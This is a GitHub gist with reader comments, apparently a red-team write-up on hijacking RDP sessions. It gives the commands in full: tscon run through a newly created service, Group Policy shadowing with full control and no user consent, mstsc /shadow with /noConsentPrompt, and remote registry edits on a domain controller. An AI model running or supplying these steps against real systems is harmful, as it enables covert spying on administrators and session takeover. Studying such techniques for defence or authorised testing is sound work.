-
-
Save bohops/f722f1a54d9ac1070350bdcaf2da618b to your computer and use it in GitHub Desktop.
RDP Eavesdropping and Hijacking | |
******************************* | |
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings | |
that is not very new... | |
=========== | |
Inspiration | |
=========== | |
As you may already know... | |
TSCON, amongst a few other tricks, is a nice way to hijack RDP sessions (even disconnected sessions) on the same box by executing the | |
command as SYSTEM like so: | |
sc.exe create hijackservice binpath= “cmd.exe /k tscon <#id> /dest:rdp-tcp#<num>” | |
sc.exe start hijackservice | |
Source ->[https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6] | |
(^Great write-up and well worth the read) | |
=============== | |
Another Fun Way | |
=============== | |
Let’s say that you own a server, a few servers, or the domain for that matter, but you really haven’t found a way to achieve your | |
ultimate Red Team goal. As “admin” (with a few caveats), you possess the ability to influence (local) Group Policy. With this power, | |
you can set Group Policy to “shadow” other *active* Remote Desktop/Terminal Server sessions. In other words, you can eavesdrop | |
(watch what the admin does) or completely take control of the session similar to TSCON. Here are the basic steps… | |
1) Influence domain group policy (gpmc.msc) or local group policy (gpedit.msc) | |
2) Drill down to this path... | |
Computer Configuration > Windows Settings > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host | |
3) Select “Set rules for Remote control of Remote Desktop Services user sessions” | |
4) Select Enable, Options, “Full Control without users permission”, Apply, OK | |
*You could also select “View Session without user’s permission” if you only want to eavesdrop | |
5) Wait a few minutes or force a group policy update | |
Gpupdate /force | |
6) Attempt to connect to the remote session with shadow.exe (if you can find it) or use qwinsta/mstsc like so… | |
Qwinsta /server:<target> //to get session | |
mstsc /shadow:<session> /v:<target> /control /noConsentPrompt | |
7) Grab popcorn and wait until the admin is no longer moving the cursor :-) | |
================ | |
Some Other Notes | |
================ | |
- This method has a lot of overhead, but the ability to observe is a powerful thing | |
- I read somewhere that this may not work on Server 2012 but was re-introduced in Server 2012 R2. | |
(I *assume* that this will work for previous versions in some way and 2012 R2 forward.) | |
- I tried to get this to work without the Group Policy via Registry manipulation but failed miserably | |
(I observed Access Denied Errors telling me the Group Policy wasn’t enabled...which was quite true) | |
- If you think you can find a way to get ^ to work, start here: | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /t REG_DWORD /v fInheritShadow /d 0x0 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /t REG_DWORD /v Shadow /d 0x2 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v fInheritShadow /d 0x0 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v Shadow /d 0x2 /f | |
reg add "\\ACMEDC\HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\Console" /t REG_DWORD /v Shadow /d 0x2 /f | |
- Thanks for taking the time to read this unorganized gist – Good Luck! | |
This wouldn't be very straight forward, but you could export the Local GPO using the LGPO.exe (Contained within "Microsoft Security Compliance Toolkit") to backup the GPO, then load that GPO on a temp VM, modify whatever GPO's you want to tweak and push it back to the client. Just make sure that the host name on the target and VM are the same and you should be good.
That's a good idea, thanks! I was also looking at something like this -> http://brandonpadgett.com/powershell/Local-gpo-powershell/
Could be viable - if I have some time this weekend, I'll check out these approaches and report back the findings (or gotchas)
Shadowing only works on Windows 2012 R2 onward, does not work on Windows 2008 R2. So does the mstsc client.
^ This appears to be the case. From what I've read, it does work on 2003 but may require the use of shadow.exe
So that is a good point. I failed to mention that the GPO overlay above will create Registry Entries with the Shadow value with the assigned data. When removing the GPO entry, the value/data remained but was not enforced. If you can "trick" the registry to enforce fake "GPO", you may have a winner - this is interesting but I am quite naive on how to approach this, nor I am confident that this would actually work. Regardless, it would be cool to find a registry way to do this...maybe with more research time to fully understand the implications of GPO/Enforcement/Registry as well as a performing a binary analysis on mstsc.exe itself to find related, hard-coded strings and other opportunities for greater influence.